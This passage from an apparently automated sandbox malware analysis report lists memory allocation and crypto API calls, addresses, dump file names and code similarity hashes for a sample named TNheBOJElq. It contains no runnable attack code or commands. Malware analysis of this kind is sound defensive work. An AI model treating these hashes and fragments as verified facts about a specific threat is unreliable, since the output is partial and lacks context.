                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A565
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: e8565d90e2db421b83f4916adcffea18bd981e862c767b6e69cf0c45f7b91059
                                    • Instruction ID: 128f7ee39f0dec468048c5c1df4878f512dd0493d0641428d0f4c4d1206c0b01
                                    • Opcode Fuzzy Hash: e8565d90e2db421b83f4916adcffea18bd981e862c767b6e69cf0c45f7b91059
                                    • Instruction Fuzzy Hash: 9011ED76604A26EFCB089F66FD94419FBA1FF48361314952AD809A3A21CB74AC24CFC0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00E09BB3,?,?,00000000), ref: 00E0FEE1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00E09BB3,?,?,00000000), ref: 00E0FEF9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00E09BB3,?,?,00000000), ref: 00E0FF16
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0FF24
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 110aa303ad68f99f069988dee5316f5b816e928a319773f7c97199b8d5a9ec77
                                    • Instruction ID: 9c6b270e2f7bbe73a5ae471c1eacac5abfcbe30117e1f718a655b1a44c9b6575
                                    • Opcode Fuzzy Hash: 110aa303ad68f99f069988dee5316f5b816e928a319773f7c97199b8d5a9ec77
                                    • Instruction Fuzzy Hash: AB11C233605312DFC7388F94D884A6EB7B4FB01325F21052DE816B7961C771B9A1CB94
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A0A9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A0CB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A0E8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A100
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: af657b7a2c25288ee74d959db8024e221dea235ca24ea7945ceeccbc56e79e25
                                    • Instruction ID: cbc5b870ea9946fac2d5d80c443a61f24df15f829b3b5af7bf4f75aaa08377f4
                                    • Opcode Fuzzy Hash: af657b7a2c25288ee74d959db8024e221dea235ca24ea7945ceeccbc56e79e25
                                    • Instruction Fuzzy Hash: D1116136514B16EFDB149F16F858799BBA0FF0436AF14802AD401A3661CBB8BC68CFD4
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E21857), ref: 00E35C78
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E35CAD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E35CC4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E35CDB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 0e8a315b832c9b4a169880fc88bd844b9f683fbf4fd92477450b3cc1869aed55
                                    • Instruction ID: cb0d6994bb5bc9987f3ed3a1a2b90c33d113e5d90e051b5893ef67d13037511e
                                    • Opcode Fuzzy Hash: 0e8a315b832c9b4a169880fc88bd844b9f683fbf4fd92477450b3cc1869aed55
                                    • Instruction Fuzzy Hash: 1B01ED76A04A26DFCB085F56FC54419FBA1FF483A2310852AE419A3671CBB46C28CFD0
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C7B9
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C7D6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C7EF
                                      • Part of subcall function 00E4C6E0: CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,766B0130,?,00E4C800,00000000), ref: 00E4C6F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C816
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: freemalloc$AcquireContextCrypt
                                    • String ID:
                                    • API String ID: 669775102-0
                                    • Opcode ID: c5ea851fd7be3a06f6c9d56394e3d8d36d1f1179fe2ebcdd276fe6ae711cf8df
                                    • Instruction ID: 6ac5b49b2fe4739fe348b6b48108525f3f9cf63762391297232fb040b4380bbf
                                    • Opcode Fuzzy Hash: c5ea851fd7be3a06f6c9d56394e3d8d36d1f1179fe2ebcdd276fe6ae711cf8df
                                    • Instruction Fuzzy Hash: 88018636715513DFCB886B26BC1811A7B95EF847F27319427D809F32A0DF645C088B90